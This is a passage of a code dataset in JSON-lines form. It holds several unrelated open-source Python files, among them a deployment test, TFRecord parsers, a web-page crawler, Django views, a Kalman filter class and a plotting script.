sorted(result.result[\"metadata\"][\"warnings\"]) == sorted(warnings)\n assert result.result[\"message\"] == message\n caplog.clear()\n\n # normal\n result = await client.deploy(environment)\n await verify(result, a1=1)\n\n # only agent1\n result = await client.deploy(environment, agents=[\"agent1\"])\n await verify(result, a1=2, warnings=None)\n\n # only agent5 (not in model)\n result = await client.deploy(environment, agents=[\"agent5\"])\n await verify_failed(\n result, 404, \"No agent could be reached\", warnings=[f\"Model version {version} does not contain agents named [agent5]\"]\n )\n\n # only agent2 (not alive)\n result = await client.deploy(environment, agents=[\"agent2\"])\n await verify_failed(result, 404, \"No agent could be reached\", warnings=[\"Could not reach agents named [agent2]\"])\n\n # All of it\n result = await client.deploy(environment, agents=[\"agent1\", \"agent2\", \"agent5\"])\n await verify(\n result,\n a1=3,\n agents=[\"agent1\"],\n warnings=[\"Could not reach agents named [agent2]\", f\"Model version {version} does not contain agents named [agent5]\"],\n )\n","repo_name":"inmanta/inmanta-core","sub_path":"tests/agent_server/test_deploy_trigger.py","file_name":"test_deploy_trigger.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"82"} +{"seq_id":"72119951309","text":"\nimport os\n# from predict_content import pre_title\nfrom find_Title import findTitleLabel\nimport re\nimport joblib\nfrom bs4 import BeautifulSoup\nmark_txt = {'0':\"personal_information_type.txt\",'1':\"personal_information_type.txt\",'2':\"personal_information_type.txt\",\n '3':\"share_information.txt\",'4':\"protect_information.txt\",\n '5':\"advertising.txt\",'6':\"user_right.txt\",'7':\"special_group.txt\",\n '8':\"special_area.txt\",'9':\"update.txt\",'10':\"way_to_collect.txt\",\n '11':\"provider.txt\",'12':\"data_retention.txt\",'13':\"personal_information_type.txt\",'14':\"thrid_party.txt\",'15':\"personal_infoinformation_tyoe.txt\"}\nclf = joblib.load('bys_classifier.pkl')\ntf = joblib.load('bys_tf.pkl')\ndef pre_title(title_list):\n type = 0\n cookie = 0\n share = 0\n security = 0\n right = 0\n children = 0\n specialArea = 0\n update = 0\n how = 0\n provide = 0\n retention = 0\n useData = 0\n clean_title_list = []\n for title in title_list:\n if title.text != \"•\":\n clean_title_list.append(title)\n order = []\n for title in clean_title_list:\n title_Str = re.sub(r'\\s+', ' ', str(title))\n title_Str = re.sub(r'<[^<]+?>', '', title_Str).replace('\\n', '').strip()\n title_Str = title_Str.lower()\n if title is None:\n continue\n try:\n mark = clf.predict(tf.transform([title_Str]))\n # print(\"---------\")\n # print(title_Str)\n # print(mark)\n # print(\"---------\")\n if mark[0] == \"1\":\n if \"USE\" in title_Str or \"use\" in title_Str:\n how = 1\n type = 1\n elif mark[0] == \"2\":\n cookie = 1\n elif mark[0] == \"3\":\n share = 1\n elif mark[0] == \"4\":\n security = 1\n elif mark[0] == \"6\":\n right = 1\n elif mark[0] == \"7\":\n children = 1\n elif mark[0] == \"8\":\n specialArea = 1\n elif mark[0] == \"9\":\n update = 1\n elif mark[0] == \"10\":\n how = 1\n type = 1\n elif mark[0] == \"11\":\n provide = 1\n elif mark[0] == \"12\":\n retention = 1\n elif mark[0] == \"13\":\n useData = 1\n elif mark[0] == \"15\":\n how = 1\n type = 1\n except Exception as e:\n continue\n if mark[0] not in order:\n order.append(mark[0])\n\n return type , cookie , share , security , right , children , specialArea , update , how , provide , retention , useData, order\n\ndef list_files(directory):\n files = []\n for filename in os.listdir(directory):\n filepath = os.path.join(directory, filename)\n if os.path.isfile(filepath):\n files.append(filepath)\n return files\ndef all_process(path):\n try:\n soup = BeautifulSoup(open(path),features=\"html.parser\",)\n except Exception:\n print('Formatting issues')\n return 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\"N\",1, 0\n label = findTitleLabel(path)\n if label == \"TitleWrong\":\n print(\"TitleWrong\")\n return 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ,\"N\",0, 1\n title_list = soup.find_all(label)\n\n # print(title_list)\n type, cookie, share, security, right, children, specialArea, update, how, provide, retention, useData, order = pre_title(title_list)\n return type, cookie, share, security, right, children, specialArea, update, how, provide, retention, useData, order , 0, 0\n# print(all_process(\"./pp_example/69_Developer Privacy Policy.html\"))\n\nif __name__ == \"__main__\":\n folder_path = \"./pp_example/\"\n files_in_folder = list_files(folder_path)\n for file in files_in_folder:\n if file == \"./pp_example/.DS_Store\":\n continue\n print(\"----------------------------------------------------------------------------------\")\n print(all_process(file))\n print(file)\n\n","repo_name":"UQ-Trust-Lab/Quper","sub_path":"src/compliance_of_disclosure/compliance_of_disclosure.py","file_name":"compliance_of_disclosure.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20586768471","text":"\"\"\" TFRecords contain serialized examples. Parsers read in these parsed\n examples and return a decoded tf.Tensor.\n\"\"\"\n\nfrom typing import Tuple\n\nimport tensorflow as tf\n\n\ndef parse_image(serialized: tf.Tensor, channels: int = 3) -> tf.Tensor:\n \"\"\"Parse an image contained in 'serialized' under the key 'image/encoded'.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n channels: int, number of color channels in the returned image\n\n Returns:\n image: tf.Tensor with dtype tf.uint8 and shape [height, width, channels]\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized, features={\"image/encoded\": tf.io.FixedLenFeature((), tf.string)}\n )\n\n image = tf.image.decode_image(parsed_example[\"image/encoded\"], channels=channels)\n return image\n\n\ndef parse_detection(serialized: tf.Tensor) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor]:\n \"\"\"Parse bounding boxes and classes contained in 'serialized' under the\n key 'image/object/bbox/{xmin, xmax, ymin, ymax}' and\n 'image/object/class/{text, labels}' and returns a boundingbox and\n class Tensor.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n\n Returns:\n boundingboxes: tf.Tensor with dtype tf.int32 and shape [num_boxes, 4]\n classes: tf.Tensor with dtype tf.int32 and shape [num_boxes]\n texts: tf.Tensor with dtype tf.string and shape [num_boxes]\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized,\n features={\n \"image/object/bbox/ymin\": tf.io.VarLenFeature(tf.float32),\n \"image/object/bbox/xmin\": tf.io.VarLenFeature(tf.float32),\n \"image/object/bbox/ymax\": tf.io.VarLenFeature(tf.float32),\n \"image/object/bbox/xmax\": tf.io.VarLenFeature(tf.float32),\n \"image/object/class/text\": tf.io.VarLenFeature(tf.string),\n \"image/object/class/label\": tf.io.VarLenFeature(tf.int64),\n },\n )\n\n ymin = tf.sparse.to_dense(parsed_example[\"image/object/bbox/ymin\"])\n xmin = tf.sparse.to_dense(parsed_example[\"image/object/bbox/xmin\"])\n ymax = tf.sparse.to_dense(parsed_example[\"image/object/bbox/ymax\"])\n xmax = tf.sparse.to_dense(parsed_example[\"image/object/bbox/xmax\"])\n bboxes = tf.stack((ymin, xmin, ymax, xmax), axis=-1)\n\n text = tf.sparse.to_dense(\n parsed_example[\"image/object/class/text\"], default_value=\"\"\n )\n label = tf.sparse.to_dense(parsed_example[\"image/object/class/label\"])\n return bboxes, label, text\n\n\ndef parse_classification(serialized: tf.Tensor) -> tf.Tensor:\n \"\"\"Parse a classlabel contained in 'serialized' under the key\n 'image/class/label' and return it.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n Returns:\n class: tf.Tensor with dtype tf.int64 and shape []\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized, features={\"image/class/label\": tf.io.FixedLenFeature((), tf.int64)}\n )\n\n label = parsed_example[\"image/class/label\"]\n return label\n\n\ndef parse_probability(serialized: tf.Tensor) -> tf.Tensor:\n \"\"\"Parse probabilities contained in 'serialized' under the key\n 'image/class/prob' and returns them.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n Returns:\n probabilities: tf.Tensor with dtype tf.float and shape [num_classes]\n \"\"\"\n parsed_example = tf.io.parse_single_example(\n serialized,\n features={\n \"image/class/prob\": tf.io.VarLenFeature(tf.float32),\n },\n )\n\n probabilities = tf.sparse.to_dense(parsed_example[\"image/class/prob\"])\n return probabilities\n\n\ndef parse_segmentation(serialized: tf.Tensor) -> tf.Tensor:\n \"\"\"Parse segmentation contained in 'serialized' under the key\n 'image/segmentation/class/encoded' and returns it.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n Returns:\n segmentation: tf.Tensor with dtype tf.int64 and shape [H, W, 1]\n \"\"\"\n key = \"image/segmentation/class/encoded\"\n parsed_example = tf.io.parse_single_example(\n serialized, features={key: tf.io.FixedLenFeature((), tf.string)}\n )\n\n segmentation = tf.image.decode_png(parsed_example[key])\n return segmentation\n\n\ndef parse_instance_segmentation(serialized: tf.Tensor) -> tf.Tensor:\n \"\"\"Parse segmentation contained in 'serialized' under the key\n 'image/object/mask' and returns it.\n\n Args:\n serialized: 0-d tf.Tensor with dtype=tf.string containing the serialized example\n Returns:\n instance_segmentations: tf.Tensor with dtype tf.int64 and shape [N, H, W, 1]\n \"\"\"\n key = \"image/object/mask\"\n parsed_example = tf.io.parse_single_example(\n serialized,\n features={\n key: tf.io.VarLenFeature(tf.string),\n },\n )\n\n instance_segmentations = tf.map_fn(\n tf.image.decode_png, parsed_example[key], dtype=tf.uint8\n )\n return instance_segmentations\n","repo_name":"adriankoering/tfrecord_io","sub_path":"tfrecord_io/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"35261552375","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\nimport os\nfrom logging import DEBUG, StreamHandler, getLogger\n\nimport lxml\nimport requests\nfrom bs4 import BeautifulSoup\n\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setFormatter(logging.Formatter('%(asctime)s: %(message)s', datefmt='%Y/%m/%d %H:%M:%S'))\nhandler.setLevel(DEBUG)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\nlogger.propagate = False\n\n\ndef main():\n try:\n parser = argparse.ArgumentParser(description='requests crawler for internal lecture')\n parser.add_argument('-u', '--url', type=str, dest='url', required=True, help='access url to want to get web-page as htlm file.')\n parser.add_argument('-f', '--filename', type=str, dest='file_name', required=True, help='filename of output file which got by requetsts access')\n args = parser.parse_args()\n\n headers = {\n 'User-Agent': 'Mozilla / 5.0 (MacintoshIntel Mac OS X 10_12_6) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 62.0.3202.89 Safari / 537.36'\n }\n res = requests.get(\"http://{}\".format(args.url), headers=headers)\n logger.debug(\"accessed http://{}\".format(args.url))\n\n if res.status_code == 200:\n logger.debug(\"succeeded access.\")\n file_name = \"{}/html/{}\".format(os.path.dirname(os.path.abspath(__file__)), args.file_name)\n with open(file_name, \"w\") as f:\n logger.debug(\"write html data to file.\")\n f.write(str(BeautifulSoup(res.text, \"lxml\")))\n logger.debug(\"finish write data.\")\n\n except Exception as e:\n logger.debug(e)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kazu0716/scrayping-lecture","sub_path":"answer/request_crawler.py","file_name":"request_crawler.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"14425288504","text":"#Task 6 - Q15 : Linear Algebra\r\n\r\n\r\nimport numpy as np\r\n\r\nN = int(input())\r\n\r\nl = []\r\nfor i in range(N):\r\n A = list(map(float,input().split()))\r\n l.append(A)\r\n \r\na = np.array(l)\r\n\r\nprint(round(np.linalg.det(a),2))\r\n","repo_name":"Bimal-101/Data_Science_Works","sub_path":"Innomatics/Assignment/Task 6/T6_Q15.py","file_name":"T6_Q15.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35645391250","text":"master_input = []\nwith open(\"input/day2_input.txt\") as f:\n for line in f:\n l = line.strip()\n # print(l)\n master_input = [int(n) for n in l.split(',')]\n\ndef find_output(input):\n command_index = 0\n\n while input[command_index] != 99:\n\n command = input[command_index]\n val_one = input[input[command_index + 1]]\n val_two = input[input[command_index + 2]]\n save_to = input[command_index + 3]\n\n # print('command_index: ' + str(command_index))\n # print('command: ' + str(input[command_index]))\n # print('val_one: ' + str(val_one))\n # print('val_two: ' + str(val_two))\n # print('save_to: ' + str(save_to))\n if save_to >= len(master_input):\n break\n\n if command == 1:\n input[save_to] = val_one + val_two\n elif command == 2:\n input[save_to] = val_one * val_two\n\n # print(input)\n # print('\\n')\n\n command_index += 4\n\n # print('command_index: ' + str(command_index) + '\\n')\n # print('command: ' + str(input[command_index]) + '\\n')\n # print(\"HELLO\")\n return(input[0])\n\nprint(\"****START****\")\nnv = -1\n\nfor i in range(100):\n for j in range(100):\n # print(\"i: \" + str(i) + \" j: \" + str(j))\n # This was the key, and it was hinted in the instructions.\n # Need to make fresh copies, otherise the lists of copied by reference.\n inp = master_input.copy()\n inp[1] = i\n inp[2] = j\n # print(inp)\n output = find_output(inp)\n # print(output)\n if output == 19690720:\n nv = 100 * i + j\n print(nv)\n break\n inp = master_input.copy()\n inp[1] = j\n inp[2] = i\n # print(inp)\n output = find_output(inp)\n # print(output)\n if output == 19690720:\n nv = 100 * j + i\n print(nv)\n break\n if nv != -1:\n break","repo_name":"killercatfish/AdventCode","sub_path":"2019/Day2/day2_part2.py","file_name":"day2_part2.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70911966349","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.shortcuts import redirect, render\n\n# Forms\nfrom vehicle_inventory.forms import VehicleForm\n\n# Serializer\nfrom vehicle_inventory.serializers import VehicleSerializer, CreateVehicleSerializer\n\n# Models\nfrom vehicle_inventory.models import Vehicle\n\n\n@api_view(['Get'])\ndef list_vehicles(request):\n \"\"\"List Vehicles.\"\"\"\n vehicles = Vehicle.objects.all()\n serializer = VehicleSerializer(vehicles, many=True)\n return Response(serializer.data)\n\n\n@api_view(['Get'])\ndef list_vehicles_portal(request):\n \"\"\"List Vehicles.\"\"\"\n vehicles = Vehicle.objects.all()\n print(vehicles)\n return render(\n request=request,\n template_name=\"list.html\",\n context={\n 'vehicles': vehicles\n }\n )\n\n\n@api_view(['GET', 'POST'])\ndef create_vehicle(request):\n \"\"\"Create a Vehicle.\"\"\"\n if request.method == 'POST':\n serializer = CreateVehicleSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n vehicle = serializer.save()\n return redirect('v1/portal/vehicles/list')\n\n else:\n return render(\n request=request,\n template_name=\"new.html\",\n )\n","repo_name":"Audio10/Dealership","sub_path":"vehicle_inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11376079522","text":"from __future__ import division\n\"\"\"@package etddf\n\nFilter class for event triggering.\n\nPrimary filter class is ETFilter but an asset's main filter differs slightly. The main filter needs access\nto common filter's (ETFilter) estimate in order to fuse implicit measurements. Therefore another class exists,\nETFilter_Main, that also takes in a dictionary with common filters to other assets.\n\nSupports following dynamics, dimensions and states\n - Linear 1D (x, x_dot)\n - Linear 2D (x, y, x_dot, y_dot)\n - Nonlinear 2D (x, y, yaw, x_dot, y_dot, yaw_dot)\n - Linear 3D (x, y, z, x_dot, y_dot, z_dot)\n - Nonlinear 3D (x, y, z, yaw, x_dot, y_dot, z_dot, yaw_dot)\n\nSupports fusing all Explicit and Implicit measurements defined in etddf/measurements.py\n\"\"\"\n__author__ = \"Luke Barbier\"\n__copyright__ = \"Copyright 2020, COHRINT Lab\"\n__email__ = \"luke.barbier@colorado.edu\"\n__status__ = \"Stable\"\n__license__ = \"MIT\"\n__maintainer__ = \"Luke Barbier\"\n\nimport numpy as np\nfrom etddf.measurements import *\nfrom etddf.dynamics import linear_propagation\nfrom etddf.normalize_angle import *\nfrom etddf.measurement_expected import get_nonlinear_expected_meas\nfrom etddf.measurement_jacobians import get_measurement_jacobian\nfrom etddf.instantiate_asset import instantiate_asset_linrel, check_instantiate_asset_linrel\nfrom scipy.stats import norm as normal\nfrom copy import deepcopy\nfrom pdb import set_trace\nfrom scipy import integrate\n\nDEBUG=False\n# Uncertainty hreshold at which we drop all previous tracking and instantiate a new tracking of an asset based off of range/bearing measurement data\n# Used on first measurement of red asset\nNO_ASSET_INFORMATION = 50**2 \n\nclass ETFilter(object):\n\n def __init__(self, my_id, num_ownship_states, world_dim, x0, P0, linear_dynamics):\n self.my_id = my_id\n self.num_ownship_states = num_ownship_states\n self.world_dim = world_dim\n self.x_hat = deepcopy(x0)\n self.P = deepcopy(P0)\n self.linear_dynamics = linear_dynamics\n self.num_states = self.x_hat.size\n if (self.num_states % self.num_ownship_states) != 0:\n raise ValueError(\"Dimensionality of state vector does not align with the number of ownship states.\")\n elif num_ownship_states < world_dim:\n raise ValueError(\"Number of ownship states does not make sense for world dimension\")\n self.num_assets = int( self.num_states / self.num_ownship_states )\n self.meas_queue = []\n\n def check_implicit(self, meas):\n \"\"\"Checks if a measurement can be fused implicitly\n\n Arguments:\n meas {etddf.measurements.Explicit} -- Measurement to be checked\n\n Raises:\n TypeError: meas is not of type Explicit\n\n Returns:\n bool -- True for implicit / False for explicit\n \"\"\"\n # TODO add support for scaling innovation check by the uncertainty\n if not isinstance(meas, Explicit):\n raise TypeError(\"meas must of type Explicit\")\n if meas.is_angle_meas:\n meas.data = normalize_angle(meas.data)\n\n C = get_measurement_jacobian(meas, self.x_hat, self.num_states, self.world_dim, self.num_ownship_states)\n innovation = self._get_innovation(meas, C)\n return np.abs(innovation) <= meas.et_delta\n\n def add_meas(self, meas):\n \"\"\"Adds a measurement to the filter\n\n Arguments:\n meas {etddf.measurements.Measurement} -- Measurement to be fused\n\n Raises:\n TypeError: meas is not of type Measurement\n \"\"\"\n if DEBUG:\n print(str(self.my_id) + \" receiving meas: \" + meas.__class__.__name__ + \" | data: \" + str(meas.data))\n\n if not isinstance(meas, Measurement):\n raise TypeError(\"meas must of type Measurement\")\n if meas.is_angle_meas and not isinstance(meas, Implicit):\n meas.data = normalize_angle(meas.data)\n\n self.meas_queue.append(meas)\n\n # Check if we should instantiate this asset based off of the meas LinRel information\n if check_instantiate_asset_linrel(meas, self.P, self.meas_queue, NO_ASSET_INFORMATION, self.num_ownship_states):\n self.x_hat, self.P, self.meas_queue = instantiate_asset_linrel(meas.measured_asset_id, deepcopy(self.x_hat), deepcopy(self.P), deepcopy(self.meas_queue), self.num_ownship_states)\n \n def predict(self, u, Q, time_delta=1.0, use_control_input=False):\n \"\"\"Runs predicion step on the filter\n\n Arguments:\n u {np.ndarray} -- control input (num_ownship_states / 2, 1)\n Q {np.ndarray} -- motion/process noise (nstates, nstates)\n\n Keyword Arguments:\n time_delta {float} -- Amount of time to predict in future (default: {1.0})\n use_control_input {bool} -- Whether to use control input or assume constant velocity (default: {False})\n\n Raises:\n ValueError: Incorrect u dimensions\n ValueError: Incorrect Q dimensions\n NotImplementedError: Nonlinear Propagation\n \"\"\"\n if u.shape[1] > u.shape[0]:\n raise ValueError(\"u must be column vector\")\n if Q.shape != self.P.shape:\n raise ValueError(\"Q must have (state x state) dimensions\")\n\n if self.linear_dynamics:\n self.x_hat, A = linear_propagation(self.x_hat, u, self.num_ownship_states, self.my_id, time_delta, use_control_input)\n self.P = A.dot( self.P.dot( A.T )) + Q\n else: # nonlinear dynamics\n # G = nonlinear_propagation(u)\n # self.P = G.dot( self.P.dot( G.T )) + Q\n # self.x_hat = normalize_all_angles(self.x_hat, self.num_ownship_states, self.num_assets, self.world_dim)\n raise NotImplementedError(\"nonlinear propagation requested\")\n\n def correct(self):\n \"\"\"Runs correction step on the filter\n \"\"\"\n if not self.meas_queue:\n # print(\"meas_queue is empty!\")\n return\n\n x_hat_start = deepcopy(self.x_hat)\n P_start = deepcopy(self.P)\n for meas in self.meas_queue:\n if DEBUG:\n print(\"Fusing \" + meas.__class__.__name__ + \" of \" + str(meas.src_id) + \" w/ data: \" + str(meas.data))\n print(\"State of Filter:\")\n print(\"x_hat\")\n print(self.x_hat)\n print(\"P\")\n print(self.P)\n\n R = meas.R\n if isinstance(meas, Explicit):\n C = get_measurement_jacobian(meas, self.x_hat, self.num_states, self.world_dim, self.num_ownship_states)\n K = self._get_kalman_gain(C, R)\n innovation = self._get_innovation(meas, C).reshape(1,1)\n self.x_hat += np.dot( K, innovation)\n tmp = np.eye(self.num_states) - np.dot(K, C)\n self.P = tmp.dot(self.P)\n # self.P = np.dot( np.dot(tmp, self.P), tmp.T) + K.dot(R_mat.dot(K.T))\n else: # Implicit Update\n C = get_measurement_jacobian(meas, self.x_hat, self.num_states, self.world_dim, self.num_ownship_states)\n mu, Qe, alpha = self._get_implicit_predata(C, R, x_hat_start, P_start, meas)\n z_bar, curly_theta = self._get_implicit_data(meas.et_delta, mu, Qe, alpha)\n K = self._get_kalman_gain(C, R)\n if meas.is_angle_meas:\n z_bar = normalize_angle(z_bar)\n self.x_hat += np.dot(K, z_bar)\n self.P = self.P - curly_theta * K.dot(C.dot(self.P))\n self.x_hat = normalize_all_angles( self.x_hat , self.num_ownship_states, self.num_assets, self.world_dim)\n # Clear measurement queue\n self.meas_queue = []\n\n # If ETFilter_Main, method is overridden\n def _get_implicit_predata(self, C, R, x_hat_start, P_start, meas):\n mu = alpha = 0 # mu, alpha cancel out in the common information filter, not the case in main filter\n Qe = np.abs( C.dot( P_start.dot( C.T )) + R )\n return mu, Qe, alpha\n\n def _get_innovation(self, meas, C):\n expected_meas = None\n if meas.is_linear_meas:\n expected_meas = C.dot(self.x_hat)\n else:\n expected_meas = get_nonlinear_expected_meas(meas, self.x_hat, self.world_dim, self.num_ownship_states)\n # if not meas.is_linear_meas:\n # print(\"expected meas \" + meas.__class__.__name__ + \" : \" + str(expected_meas))\n # print(\"---> actual meas: \" + str(meas.data))\n if meas.is_angle_meas:\n return normalize_angle( meas.data - expected_meas)\n else:\n return meas.data - expected_meas\n\n def _get_kalman_gain(self, C, R):\n tmp = np.dot( np.dot(C, self.P), C.T ) + R\n tmp_inv = np.linalg.inv( tmp ) if tmp.size > 1 else tmp**(-1) # Accomadate 1D and >1D filter\n return self.P.dot(C.T.dot( tmp_inv ))\n\n def _get_implicit_data(self, delta, mu, Qe, alpha):\n Q_func = lambda x : 1 - normal.cdf(x)\n \n arg1 = ( -delta + alpha - mu ) / np.sqrt( Qe )\n arg2 = ( delta + alpha - mu ) / np.sqrt( Qe )\n\n tmp = ( normal.pdf( arg1 ) - normal.pdf( arg2 ) ) / ( Q_func(arg1) - Q_func(arg2 ) )\n z_bar = tmp.dot( np.sqrt( Qe ) )\n\n tmp2 = ( arg1.dot( normal.pdf( arg1)) - arg2.dot( normal.pdf( arg2 )) ) / ( Q_func(arg1) - Q_func(arg2))\n curly_theta = np.linalg.matrix_power(tmp, 2) - tmp2\n\n return z_bar, curly_theta\n\nclass ETFilter_Main( ETFilter ):\n \"\"\"Main filter for an asset\n Differs slightly from an ETFilter in its implicit measurement update because it \n needs access to common filters with other assets to fuse implicit measurements\n \"\"\"\n def __init__(self, my_id, num_ownship_states, world_dim, x0, P0, linear_dynamics, common_filters):\n \"\"\"\n common_filters : dict\n key : int\n other asset id\n value : ETFiler\n common filter between both assets\n \"\"\"\n super(ETFilter_Main, self).__init__(my_id, num_ownship_states, world_dim, x0, P0, linear_dynamics)\n self.common_filters = common_filters\n \n def _get_implicit_predata(self, C, R, x_hat_start, P_start, meas):\n x_ref = self._get_common_filter_states(meas.src_id).x_hat\n if meas.is_linear_meas:\n mu = C.dot(self.x_hat) - C.dot(x_hat_start )\n Qe = np.abs(C.dot( P_start.dot( C.T )) + R)\n alpha = C.dot( x_ref) - C.dot(x_hat_start )\n else: # Nonlinear Measurement\n mu0 = get_nonlinear_expected_meas(meas, self.x_hat, self.world_dim, self.num_ownship_states) \n mu1 = get_nonlinear_expected_meas(meas, x_hat_start, self.world_dim, self.num_ownship_states)\n mu = mu0 - mu1\n Qe = np.abs(C.dot( P_start.dot( C.T )) + R)\n alpha0 = get_nonlinear_expected_meas(meas, x_ref, self.world_dim, self.num_ownship_states)\n alpha1 = get_nonlinear_expected_meas(meas, x_hat_start, self.world_dim, self.num_ownship_states)\n alpha = alpha0 - alpha1\n if meas.is_angle_meas:\n mu = normalize_angle(mu)\n alpha = normalize_angle(alpha)\n return mu, Qe, alpha\n\n def _get_common_filter_states(self, asset_id):\n # If only one common filter, just return that one\n if len(self.common_filters) == 1:\n return self.common_filters[self.common_filters.keys()[0]]\n # return the specific common filter with that asset\n return self.common_filters[asset_id]","repo_name":"COHRINT/et-ddf","sub_path":"src/etddf/etfilter.py","file_name":"etfilter.py","file_ext":"py","file_size_in_byte":11487,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"39771751806","text":"# coding=utf-8\r\nimport ast\r\nimport itertools\r\nimport json\r\nimport os\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\nimport numpy as np\r\n\r\n# 用于比较S个solution在E个environment上的性能差别. 不同的性能指标放在不同的图上, 不同的解决方案在各个环境下的同一指标值放在同一张图上\r\nfrom matplotlib.ticker import FormatStrFormatter\r\n\r\ndata = {\r\n 'type': \"bar\",\r\n 'figWidth': 600,\r\n 'figHeight': 350,\r\n 'mainColors': ['#0072bc',\r\n '#d95218',\r\n '#edb021',\r\n '#7a8cbf',\r\n '#009d70',\r\n '#979797',\r\n '#53b2ea'],\r\n \r\n 'solutionList': ('VERID', 'AAR', 'IntegriDB'),\r\n 'environmentList': (\"Intel\", \"Rome\"),\r\n \r\n 'yLog': False,\r\n 'yGrid': False,\r\n \r\n 'paddingLeft': 0.2,\r\n 'paddingRight': 0.2,\r\n \r\n 'marginGroups': 0.4,\r\n 'marginInner': 0.02,\r\n 'xFontSize': 20,\r\n 'xTickRotate': False,\r\n 'yFontSize': 20,\r\n 'legendFontSize': 8,\r\n 'output': False,\r\n \r\n 'children': [\r\n {\r\n 'name': \"insertion\",\r\n 'xTitle': '',\r\n 'yTitle': 'Insertion time (ms)',\r\n 'components': (\"Acyclic add\", \"Cyclic add\"),\r\n 'yLimit': [0, 1.4],\r\n 'y': (\r\n (0.011, 0.203), # 同一个solution, 不同的environment\r\n (0.428, 0.220), # 另一个solution\r\n (0.161, 0.513)\r\n ),\r\n 'yRange': (\r\n ([0.009, 0.02], [0.1, 0.25]), # 误差\r\n ([0.428, 0.428], [0.220, 0.220]),\r\n ([0.161, 0.161], [0.513, 0.513])\r\n ),\r\n 'y2': ( # 第二个分量\r\n (0.011, 0.203),\r\n (0, 0.220),\r\n (0.161, 0.513)\r\n ),\r\n 'yRange2': (\r\n ([0.009, 0.02], [0.1, 0.25]),\r\n ([0.428, 0.428], [0.220, 0.220]),\r\n ([0.161, 0.161], [0.513, 0.513])\r\n ),\r\n },\r\n {\r\n 'name': \"ads\",\r\n 'yLog': True,\r\n 'xTitle': '',\r\n 'yTitle': 'ADS update (KB)',\r\n 'yLimit': [0.01, 190.0],\r\n 'y': (\r\n (0.147, 2.140),\r\n (1.268, 5.4367),\r\n (5.365, 5.123),\r\n ),\r\n 'yRange': (\r\n ([0.015, 0.147], [0.1, 2.140]),\r\n ([0.268, 10.268], [5.4367, 5.4367]),\r\n ([4.365, 6.365], [5.123, 5.123])\r\n ),\r\n }\r\n ]\r\n}\r\n\r\nif not os.path.exists('dist'):\r\n os.makedirs('dist')\r\n\r\n\r\ndef nonEmptyIterable(obj):\r\n \"\"\"return true if *obj* is iterable\"\"\"\r\n try:\r\n var = obj[0]\r\n return True\r\n except:\r\n return False\r\n\r\n\r\ndpi = 100\r\n\r\n\r\nclass ParallelBars:\r\n def draw(self, data, figure=None, axis=None):\r\n if isinstance(data, str):\r\n try:\r\n data = json.loads(data)\r\n except:\r\n data = ast.literal_eval(data)\r\n \r\n axes = []\r\n \r\n for plotData in data['children']:\r\n name = plotData['name']\r\n print(\"---->\" + name + \"<----\\n\")\r\n\r\n def get(key, default=None):\r\n result = plotData.get(key, None)\r\n if result is not None: return result\r\n \r\n result = data.get(key, None)\r\n if result is not None: return result\r\n \r\n return default\r\n \r\n envList = get('environmentList')\r\n solList = get('solutionList')\r\n lenSol = len(solList)\r\n components = get('components', ())\r\n lenComp = max(1, len(components))\r\n \r\n envIndex = np.arange(len(envList)) # the x locations for the groups\r\n groupWidth = 1 - get('marginGroups', 0.2)\r\n paddingLeft = get('paddingLeft', 0.1)\r\n paddingRight = get('paddingRight', 0.1)\r\n marginBars = get('marginBars', 0.02)\r\n width = groupWidth / lenSol - marginBars # the width of the bars\r\n \r\n colors = get('mainColors',\r\n ['#0072bc', '#d95218', '#edb021', '#7a8cbf', '#009d70', '#979797', '#53b2ea',\r\n \"#ee4c9c\"] + ['C%d' % (i % 10) for i in range(100)])\r\n \r\n if figure and axis:\r\n fig, ax = figure, axis\r\n else:\r\n fig, ax = plt.subplots()\r\n fig.set_size_inches(get('figWidth', 600) / dpi, get('figHeight', 350) / dpi)\r\n fig.set_dpi(dpi)\r\n \r\n rects = [None] * (lenComp * lenSol)\r\n \r\n oldy = np.array([[0.0, ] * len(envList), ] * lenSol)\r\n for comIdx in range(lenComp):\r\n yRange = get('yRange' if comIdx == 0 else 'y%dRange' % (comIdx + 1), get('yRange%d' % (comIdx + 1), None))\r\n y = plotData['y' if comIdx == 0 else 'y%d' 